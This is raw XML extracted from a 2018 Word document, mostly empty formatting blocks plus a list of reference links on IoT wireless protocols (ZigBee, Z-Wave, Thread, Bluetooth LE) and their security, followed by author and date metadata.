        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1262253213">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1309742448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1380980063">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1451438486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1467551694">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1522888311">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1685087765">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702509046">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1820148625">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1824733242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1840192448">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="196013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zwavepublic.com/specifications" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://iot.ru/promyshlennost/obzor-protokolov-besprovodnoy-svyazi-dlya-interneta-veshchey" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.nxp.com/portable-wearable/bluetooth-low-energy-for-the-internet-of-things" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.russianelectronics.ru/leader-r/review/2187/doc/57691/" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.kudelskisecurity.com/2017/11/21/zigbee-security-basics-part-3/" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.armis.com/blueborne/"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ru.wikipedia.org/wiki/L2CAP" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><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hyperlink" Target="http://www.forbes.ru/tehnologii/344713-yazyk-dlya-umnogo-doma-kak-budut-obshchatsya-ustroystva-domashney-elektroniki-i" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.threadgroup.org/technology/ourtechnology" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ieeexplore.ieee.org/document/5755291/" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberleninka.ru/article/n/zigbee-vzglyad-vglub.pdf" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.735.5603&amp;rep=rep1&amp;type=pdf"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u.wikipedia.org/wiki/%D0%AD%D0%BC%D1%83%D0%BB%D1%8F%D1%86%D0%B8%D1%8F"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xn--80aahfsmenmf.xn--p1ai/index.php/articles/17-grp-002/105-tekhnologii-umnogo-doma" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.postscapes.com/internet-of-things-protocols/" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mdpi.com/1424-8220/12/9/11734/htm" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-121r2.pdf"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xakep.ru/2015/08/10/zigbee-devices-problems"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lessons-tva.info/articles/net/013.html" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digi.com/resources/standards-and-technologies/thread-networking-protocol" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.kudelskisecurity.com/2017/11/08/zigbee-security-basics-part-2/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://geektimes.ru/post/276558/" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.simform.com/ble-iot-security-vulnerability-countermeasur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9F%D0%BE%D1%81%D0%BB%D0%B5%D0%B4%D0%BE%D0%B2%D0%B0%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9_%D0%BF%D0%BE%D1%80%D1%82"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wless.ru/technology/?tech=1" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cyberleninka.ru/article/n/problemy-bezopasnosti-internet-veschey-obzor"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www.ferra.ru/ru/digihome/review/SmartHome-Protocols/" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.kudelskisecurity.com/2017/11/01/zigbee-security-basics-part-1/" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cognosec.com/zigbee_exploited_8F_Ca9.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1</Pages>
  <Words>11351</Words>
  <Characters>64704</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>539</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Korolkov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alex Korolkov</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <cp:lastPrinted>2018-03-17T17:11:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-01-16T12:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-17T17:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>